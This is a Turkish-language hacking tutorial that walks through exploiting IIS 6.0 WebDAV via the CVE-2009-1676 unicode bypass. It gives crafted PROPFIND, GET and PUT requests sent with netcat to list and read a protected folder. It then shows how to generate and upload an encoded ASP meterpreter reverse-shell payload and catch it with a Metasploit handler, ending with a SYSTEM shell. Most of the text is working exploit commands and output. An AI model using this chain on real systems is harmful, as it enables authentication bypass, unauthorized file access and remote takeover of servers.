Webdav Servislerine Yönelik Saldırılar

Kimlik Doğrulama Gerektiren Webdav Dizinleri

dizini Windows Auth. gerektiren bir dizin. Bu dizine ve altındaki dosyalara erişim için yetkili bir kullanıcı hesabı ile kimlik doğrulama yapmak gerekmektedir.

WEBDAV Zayıflıkları

Unicode Bypass

CVE-2009-1676 güvenlik bülteni ile Microsoft IIS 6.0 web sunucusunun dosya paylaşımı için kullandığı “Webdav” servisinde uzakdan kimlik doğrulamayı bypass eden bir zaafiyet bulunduğu duyuruldu.

Kimlik doğrulama gerektiren, adresine, unicode kod kullanarak bypass işlemi uygulayabiliriz.

 

/gizli dizinini listelemek için hazırlanan özel içerik, listele.txt ;

# cat listele.txt

PROPFIND /gi%c0%afzli/ HTTP/1.1

Connection: TE

TE: trailers

Host: 192.168.1.5

Depth: 1

Content-Length: 288

Content-Type: application/xml

 

<?xml version=”1.0″ encoding=”utf-8″?>

<propfind xmlns=”DAV:”><prop>

<getcontentlength xmlns=”DAV:”/>

<getcontentfied xmlns=”DAV:”/>

<executable xmlns=”http://apache.org/dav/props/”/>

<resourcetype xmlns=”DAV:”/>

<checked-in xmlns=”DAV:”/>

<checked-out xmlns=”DAV:”/>

</prop></propfind>

Bu içeriği netcat aracılığı ile karşı tarafa gönderildiğinde, kimlik doğrulama bypass edilerek hedef dizin listelenebilinir;

# nc -vv 192.168.1.5 80 < listele.txt

192.168.1.5: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [192.168.1.5] 80 (www) open

HTTP/1.1 207 Multi-Status

Date: Tue, 10 May 2011 10:05:21 GMT

Server: Microsoft-IIS/6.0

Content-Type: text/xml

Transfer-Encoding: chunked

 

546

<?xml version=”1.0″?><a:multistatus xmlns:b=”urn:uuid:c2f41010-65b3-11d1-a29f-00aa00                    c14882/” xmlns:d=”http://apache.org/dav/props/” xmlns:c=”xml:” xmlns:a=”DAV:”><a:res                    ponse><a:href>http://192.168.1.5/gizli/</a:href><a:propstat><a:status>HTTP/1.1 200 O                    K</a:status><a:prop><a:getcontentlength b:dt=”int”>0</a:getcontentlength><a:resource                    type><a:collection/></a:resourcetype></a:prop></a:propstat><a:propstat><a:status>HTT                    P/1.1 404 Resource Not Found</a:status><a:prop><a:getcontentfied/><d:executable/><a:checked-in/><a:checked-out/></a:prop></a:propstat></a:response><a:response><a:href>http://192.168.1.5/gizli/belge.txt</a:href><a:propstat><a:status>HTTP/1.1 200 OK</a:status><a:prop><a:getcontentlength b:dt=”int”>36</a:getcontentlength><a:resourcetype/></a:prop></a:propstat><a:propstat><a:status>HTTP/1.1 404 Resource Not Found</a:status><a:prop><a:getcontentfied/><d:executable/><a:checked-in/><a:checked-out/></a:prop></a:propstat></a:response><a:response><a:href>http://192.168.1.5/gizli/index.asp</a:href><a:propstat><a:status>HTTP/1.1 200 OK</a:status><a:prop><a:getcontentlength b:dt=”int”>0</a:getcontentlength><a:resourcetype/></a:prop></a:propstat><a:propstat><a:status>HTTP/1.1 404 Resource Not Found</a:status><a:prop><a:getcontentfied/><d:executable/><a:checked-in/><a:checked-out/></a:prop></a:propstat></a:response></a:multistatus>

0

/gizli/belge.txt içeriğini okumak için hazırlanan özel içerikte, yine kimlik doğrulamayı bypass etmek için unicode kullanılabilir;

# cat oku.txt

GET /gi%c0%afzli/belge.txt HTTP/1.1

Translate: f

Connection: close

Host: 192.168.1.5

 

# nc -vv 192.168.1.5 80 < oku.txt

192.168.1.5: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [192.168.1.5] 80 (www) open

HTTP/1.1 200 OK

Connection: close

Date: Tue, 10 May 2011 09:55:45 GMT

Server: Microsoft-IIS/6.0

Content-Type: text/plain

Content-Length: 36

ETag: “16a0252ee7ecc1:1e7”

Last-Modified: Tue, 10 May 2011 07:52:16 GMT

Accept-Ranges: bytes

 

burada yazilanlar gizli bilgilerdir.

 

İçerik Yazmak İçin

Msfpayload ve msfencoder kullanarak meterpreter payloadını ters bağlantı kuracak şekilde oluşturup ve asp olarak çalışması için encode edebiliriz. Farklı bir asp web shell yazılımıda tercih edilebilinir.

Reverse Shell ile Sistem Yönetimini Ele Geçirme

Metasploit ile asp formatına uygun olarak encode edilmiş meterpreter reverse shell oluşturabiliriz.

# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 R | ./msfencode -t asp -o tcp443meterp.asp

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

 

tcp443meterp.asp dosyasının içeriğini karşı tarafa gönderelim, bunun için tcp443meterp.asp dosyasının içeriğini yaz.txt dosyasına ekletip içeriği hedefe gönderelim.

# cat tcp443meterp.asp >> /root/yaz.txt

#PUT /..%c0%af/gizli/mt.txt HTTP/1.1

Translate: f

Host: 192.168.1.5

Content-Length: 32

 

<%

Sub CnpnKLRtlY()

ZkMSe=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)
…..
kodun devamı …
…..

 

Bu dosyayı webdav dizinine yazdıkdan sonra, get isteği göndererek tetikleyelim. Ve metasploit ile meterpreter ajanımızı karşılamak için dinleme moduna geçelim;

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.2

LHOST => 192.168.1.2

msf exploit(handler) > set LPORT 443

LPORT => 443

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.2:443

[*] Starting the payload handler…

[*] Sending stage (749056 bytes) to 192.168.1.5

[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.5:1064) at Tue May 10 06:58:24 -0400 2011

meterpreter > getuid

Server username: NT AUTHORITYSYSTEM

Ve hedefte SYSTEM yetkileri ile komut satırını ele geçirmiş olduk.

Yazar: Ozan UÇAR
ozan.ucar@bga.com.tr